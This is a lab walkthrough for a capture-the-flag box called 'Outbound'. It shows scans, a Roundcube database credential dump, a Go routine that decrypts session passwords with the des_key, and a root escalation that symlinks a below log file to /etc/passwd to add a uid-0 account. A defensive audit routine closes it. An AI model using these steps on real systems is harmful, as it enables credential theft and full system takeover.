## Box Info

| OS | Difficulty |
|---|---|
| Linux | Easy |

As is common in real life pentests, you will start the Outbound box with credentials for the following account: tyler / LhKL1o9Nm3X2
## Nmap

```
[root@Hacking] /home/kali/Outbound
❯ nmap outbound.htb -A
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_ 256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open http nginx 1.24.0 (Ubuntu)
|_http-server-header: nginx/1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
```
Add mail.outbound.htb to /etc/hosts.
## Nuclei

```
[root@Hacking] /home/kali/Outbound
❯ nuclei -u http://mail.outbound.htb/
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.2
projectdiscovery.io
[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 8154
[INF] Executing 7950 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 204 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1763 (Reduced 1654 Requests)
[INF] Using Interactsh Server: oast.pro
[CVE-2025-49113:version_check] [http] [critical] http://mail.outbound.htb/ ["Roundcube Version: 1.6.10"]
[roundcube-log-disclosure] [http] [medium] http://mail.outbound.htb/roundcube/logs/errors.log ["4192"] [roundcube_path="roundcube/logs/errors.log"]
[cookies-without-secure] [javascript] [info] mail.outbound.htb ["roundcube_sessid"]
[waf-detect:nginxgeneric] [http] [info] http://mail.outbound.htb/
[ssh-server-enumeration] [javascript] [info] mail.outbound.htb:22 ["SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.12"]
[ssh-auth-methods] [javascript] [info] mail.outbound.htb:22 ["["publickey","password"]"]
[ssh-password-auth] [javascript] [info] mail.outbound.htb:22
[ssh-sha1-hmac-algo] [javascript] [info] mail.outbound.htb:22
[openssh-detect] [tcp] [info] mail.outbound.htb:22 ["SSH-2.0-OpenSSH_9.6p1 Ubuntu-3ubuntu13.12"]
```
It looks like CVE-2025-49113 is present, but exploiting it requires authentication, which the box info conveniently provides.
## CVE-2025-49113

The following steps give a reverse shell. Note that it lands in a Docker environment, running as the tyler user.
## MySQL

Port 3306 is found to be open, and user credentials are found in the web directory.
```
tyler@mail:/var/www/html/roundcube/config$ cat config.inc.php
<?php
$config = [];
// Database connection string (DSN) for read+write operations
// Format (compatible with PEAR MDB2): db_provider://user:password@host/database
// Currently supported db_providers: mysql, pgsql, sqlite, mssql, sqlsrv, oracle
// For examples see http://pear.php.net/manual/en/package.database.mdb2.intro-dsn.php
// NOTE: for SQLite use absolute path (Linux): 'sqlite:////full/path/to/sqlite.db?mode=0646'
// or (Windows): 'sqlite:///C:/full/path/to/sqlite.db'
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
// IMAP host chosen to perform the log-in.
// See defaults.inc.php for the option description.
$config['imap_host'] = 'localhost:143';
// SMTP server host (for sending mails).
// See defaults.inc.php for the option description.
$config['smtp_host'] = 'localhost:587';
// SMTP username (if required) if you use %u as the username Roundcube
// will use the current username for login
$config['smtp_user'] = '%u';
// SMTP password (if required) if you use %p as the password Roundcube
// will use the current user's password for login
$config['smtp_pass'] = '%p';
$config['support_url'] = '';
$config['product_name'] = 'Roundcube Webmail';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
$config['plugins'] = [
'archive',
'zipdownload',
];
$config['skin'] = 'elastic';
$config['default_host'] = 'localhost';
$config['smtp_server'] = 'localhost';
```
```
tyler@mail:/var/www/html/roundcube/config$ mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'use roundcube;select * from users;' -E
*************************** 1. row ***************************
user_id: 1
username: jacob
mail_host: localhost
created: 2025-06-07 13:55:18
last_login: 2025-06-11 07:52:49
failed_login: 2025-06-11 07:51:32
failed_login_counter: 1
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"hpLLqLwmqbyihpi7";}
*************************** 2. row ***************************
user_id: 2
username: mel
mail_host: localhost
created: 2025-06-08 12:04:51
last_login: 2025-06-08 13:29:05
failed_login: NULL
failed_login_counter: NULL
language: en_US
preferences: a:1:{s:11:"client_hash";s:16:"GCrPGMkZvbsnc3xv";}
*************************** 3. row ***************************
user_id: 3
username: tyler
mail_host: localhost
created: 2025-06-08 13:28:55
last_login: 2025-07-14 13:55:53
failed_login: 2025-06-11 07:51:22
failed_login_counter: 1
language: en_US
preferences: a:2:{s:11:"client_hash";s:16:"skuY0BrQUEW6IpOo";i:0;b:0;}
```
I did not find the format of this hash, but I found something in the session table.
```
tyler@mail:/$ mysql -u roundcube -pRCDBPass2025 -h localhost roundcube -e 'use roundcube;select * from session;' -E
*************************** 1. row ***************************
sess_id: 6a5ktqih5uca6lj8vrmgh9v0oh
changed: 2025-06-08 15:46:40
ip: 172.17.0.1
vars: bGFuZ3VhZ2V8czo1OiJlbl9VUyI7aW1hcF9uYW1lc3BhY2V8YTo0OntzOjg6InBlcnNvbmFsIjthOjE6e2k6MDthOjI6e2k6MDtzOjA6IiI7aToxO3M6MToiLyI7fX1zOjU6Im90aGVyIjtOO3M6Njoic2hhcmVkIjtOO3M6MTA6InByZWZpeF9vdXQiO3M6MDoiIjt9aW1hcF9kZWxpbWl0ZXJ8czoxOiIvIjtpbWFwX2xpc3RfY29uZnxhOjI6e2k6MDtOO2k6MTthOjA6e319dXNlcl9pZHxpOjE7dXNlcm5hbWV8czo1OiJqYWNvYiI7c3RvcmFnZV9ob3N0fHM6OToibG9jYWxob3N0IjtzdG9yYWdlX3BvcnR8aToxNDM7c3RvcmFnZV9zc2x8YjowO3Bhc3N3b3JkfHM6MzI6Ikw3UnYwMEE4VHV3SkFyNjdrSVR4eGNTZ25JazI1QW0vIjtsb2dpbl90aW1lfGk6MTc0OTM5NzExOTt0aW1lem9uZXxzOjEzOiJFdXJvcGUvTG9uZG9uIjtTVE9SQUdFX1NQRUNJQUwtVVNFfGI6MTthdXRoX3NlY3JldHxzOjI2OiJEcFlxdjZtYUk5SHhETDVHaGNDZDhKYVFRVyI7cmVxdWVzdF90b2tlbnxzOjMyOiJUSXNPYUFCQTF6SFNYWk9CcEg2dXA1WEZ5YXlOUkhhdyI7dGFza3xzOjQ6Im1haWwiO3NraW5fY29uZmlnfGE6Nzp7czoxNzoic3VwcG9ydGVkX2xheW91dHMiO2E6MTp7aTowO3M6MTA6IndpZGVzY3JlZW4iO31zOjIyOiJqcXVlcnlfdWlfY29sb3JzX3RoZW1lIjtzOjk6ImJvb3RzdHJhcCI7czoxODoiZW1iZWRfY3NzX2xvY2F0aW9uIjtzOjE3OiIvc3R5bGVzL2VtYmVkLmNzcyI7czoxOToiZWRpdG9yX2Nzc19sb2NhdGlvbiI7czoxNzoiL3N0eWxlcy9lbWJlZC5jc3MiO3M6MTc6ImRhcmtfbW9kZV9zdXBwb3J0IjtiOjE7czoyNjoibWVkaWFfYnJvd3Nlcl9jc3NfbG9jYXRpb24iO3M6NDoibm9uZSI7czoyMToiYWRkaXRpb25hbF9sb2dvX3R5cGVzIjthOjM6e2k6MDtzOjQ6ImRhcmsiO2k6MTtzOjU6InNtYWxsIjtpOjI7czoxMDoic21hbGwtZGFyayI7fX1pbWFwX2hvc3R8czo5OiJsb2NhbGhvc3QiO3BhZ2V8aToxO21ib3h8czo1OiJJTkJPWCI7c29ydF9jb2x8czowOiIiO3NvcnRfb3JkZXJ8czo0OiJERVNDIjtTVE9SQUdFX1RIUkVBRHxhOjM6e2k6MDtzOjEwOiJSRUZFUkVOQ0VTIjtpOjE7czo0OiJSRUZTIjtpOjI7czoxNDoiT1JERVJFRFNVQkpFQ1QiO31TVE9SQUdFX1FVT1RBfGI6MDtTVE9SQUdFX0xJU1QtRVhURU5ERUR8YjoxO2xpc3RfYXR0cmlifGE6Njp7czo0OiJuYW1lIjtzOjg6Im1lc3NhZ2VzIjtzOjI6ImlkIjtzOjExOiJtZXNzYWdlbGlzdCI7czo1OiJjbGFzcyI7czo0MjoibGlzdGluZyBtZXNzYWdlbGlzdCBzb3J0aGVhZGVyIGZpeGVkaGVhZGVyIjtzOjE1OiJhcmlhLWxhYmVsbGVkYnkiO3M6MjI6ImFyaWEtbGFiZWwtbWVzc2FnZWxpc3QiO3M6OToiZGF0YS1saXN0IjtzOjEyOiJtZXNzYWdlX2xpc3QiO3M6MTQ6ImRhdGEtbGFiZWwtbXNnIjtzOjE4OiJUaGUgbGlzdCBpcyBlbXB0eS4iO311bnNlZW5fY291bnR8YToyOntzOjU6IklOQk9YIjtpOjI7czo1OiJUcmFzaCI7aTowO31mb2xkZXJzfGE6MTp7czo1OiJJTkJPWCI7YToyOntzOjM6ImNudCI7aToyO3M6NjoibWF4dWlkIjtpOjM7fX1saXN0X21vZF9zZXF8czoyOiIxMCI7
```
Base64-decoding the vars shows that this is jacob's session.
## 3DES decrypt

Earlier, config.inc.php contained a des_key, and the decoded session also yields an auth_secret. Some research shows that Triple DES is used. First base64-decode the value and convert it to hex; the first eight bytes are the IV and the rest is the ciphertext.

SSH login.
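As an added example (not the author's code, written here with the Go standard library), this is the decryption step described above: Roundcube's session fields are base64(IV || DES-EDE3-CBC ciphertext) with PKCS#7 padding, keyed by the 24-byte des_key from config.inc.php, so RoundcubeDecrypt fed the des_key and the session's password field performs the same operation the writeup did by hand; the encrypt side is included so the format can be exercised end to end. The function names are my own, and the practical point for a defender is that anyone who can read config.inc.php and the session table can reverse this, so des_key must be protected and rotated like the passwords it wraps.

```go
package main

import (
	"bytes"
	"crypto/cipher"
	"crypto/des"
	"encoding/base64"
	"errors"
)

// RoundcubeDecrypt follows the scheme described above for Roundcube session fields (DES-EDE3-CBC,
// PKCS#7 padding): base64-decode, use the first 8 bytes as IV, decrypt the rest with the 24-byte des_key.
func RoundcubeDecrypt(desKey, b64 string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return "", err
	}
	block, err := des.NewTripleDESCipher([]byte(desKey)) // fails unless the key is exactly 24 bytes
	if err != nil {
		return "", err
	}
	if len(raw) < 2*des.BlockSize || len(raw)%des.BlockSize != 0 {
		return "", errors.New("value is not an IV followed by whole cipher blocks")
	}
	iv, ct := raw[:des.BlockSize], raw[des.BlockSize:]
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	// Check and strip PKCS#7 padding; a wrong key almost always fails here.
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > des.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return "", errors.New("bad padding: wrong key or corrupted value")
	}
	return string(pt[:len(pt)-pad]), nil
}

// RoundcubeEncrypt is the inverse; Roundcube draws a random IV, here it is a parameter for reproducibility.
func RoundcubeEncrypt(desKey, clear string, iv []byte) (string, error) {
	block, err := des.NewTripleDESCipher([]byte(desKey))
	if err != nil {
		return "", err
	}
	if len(iv) != des.BlockSize {
		return "", errors.New("iv must be exactly 8 bytes")
	}
	pad := des.BlockSize - len(clear)%des.BlockSize // always 1..8 bytes of padding
	pt := append([]byte(clear), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, iv...), ct...)), nil
}
```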
## Root

Checking sudo -l shows a wildcard in the permitted command.
```
jacob@outbound:~$ sudo -l
Matching Defaults entries for jacob on outbound:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User jacob may run the following commands on outbound:
(ALL : ALL) NOPASSWD: /usr/bin/below *, !/usr/bin/below --config*, !/usr/bin/below --debug*, !/usr/bin/below -d*
```
jacob can run /usr/bin/below * without a password, but the following arguments are forbidden: --config*, --debug*, -d*.

Look at the help output.
```
jacob@outbound:~$ sudo /usr/bin/below -h
Usage: below [OPTIONS] [COMMAND]
Commands:
live Display live system data (interactive) (default)
record Record local system data (daemon mode)
replay Replay historical data (interactive)
debug Debugging facilities (for development use)
dump Dump historical data into parseable text format
snapshot Create a historical snapshot file for a given time range
help Print this message or the help of the given subcommand(s)
Options:
--config <CONFIG> [default: /etc/below/below.conf]
-d, --debug
-h, --help Print help
```
After some searching, the intended vulnerability is CVE-2025-27591, with a few changes made. error_root.log is in a writable state.
```
jacob@outbound:/var/log/below$ echo 'root2:aacFCuAIHhrCM:0:0:,,,:/root:/bin/bash' > root2
jacob@outbound:/var/log/below$ rm error_root.log
jacob@outbound:/var/log/below$ ln -s /etc/passwd /var/log/below/error_root.log
jacob@outbound:/var/log/below$ sudo /usr/bin/below
jacob@outbound:/var/log/below$ cp root2 error_root.log
jacob@outbound:/var/log/below$ su root2
Password:
root2@outbound:/var/log/below# id
uid=0(root) gid=0(root) groups=0(root)
root2@outbound:/var/log/below#
```
```
[root@Hacking] /home/kali
❯ perl -e 'print crypt("1","aa")'
aacFCuAIHhrCM#
```
To summarise: after sudo /usr/bin/below runs, the permissions of error_root.log are set to writable; by symlinking it to /etc/passwd, that permission change lands on /etc/passwd, which lets us overwrite it.
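As an added example (not from the writeup), a small Go audit for the traces this escalation leaves in a root-owned log directory such as /var/log/below: a symlink planted among the logs, flagged as escaping the directory when it resolves elsewhere (as error_root.log -> /etc/passwd does), and any entry that has become world-writable. The Finding type and AuditLogDir name are my own; os.Lstat is used deliberately so the link itself is inspected rather than its target.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// Finding is one suspicious entry in an audited log directory.
type Finding struct{ Path, Reason string }

// AuditLogDir inspects a root-owned daemon's log directory (here
// /var/log/below) for the two conditions the escalation above relies on:
// a symlink planted among the logs, reported as "outside" when it resolves
// beyond the directory, and any entry that is world-writable.
func AuditLogDir(dir string) ([]Finding, error) {
	entries, err := os.ReadDir(dir)
	if err != nil {
		return nil, err
	}
	absDir, _ := filepath.Abs(dir)
	var findings []Finding
	for _, e := range entries {
		p := filepath.Join(dir, e.Name())
		info, err := os.Lstat(p) // Lstat: examine the link itself, not what it points to
		if err != nil {
			continue
		}
		if info.Mode()&os.ModeSymlink != 0 {
			target, _ := os.Readlink(p)
			if !filepath.IsAbs(target) {
				target = filepath.Join(dir, target)
			}
			target, _ = filepath.Abs(target)
			where := "inside"
			if rel, err := filepath.Rel(absDir, target); err != nil || rel == ".." || strings.HasPrefix(rel, "../") {
				where = "outside"
			}
			findings = append(findings, Finding{p, fmt.Sprintf("symlink resolves %s the log dir: %s", where, target)})
			continue
		}
		if info.Mode().Perm()&0o002 != 0 {
			findings = append(findings, Finding{p, fmt.Sprintf("world-writable (mode %04o)", info.Mode().Perm())})
		}
	}
	return findings, nil
}
```

Run it from a cron job or an integrity check against /var/log/below and /etc/passwd; a symlink that escapes the log directory is the tell-tale of the trick above, and a world-writable /etc/passwd is its end state.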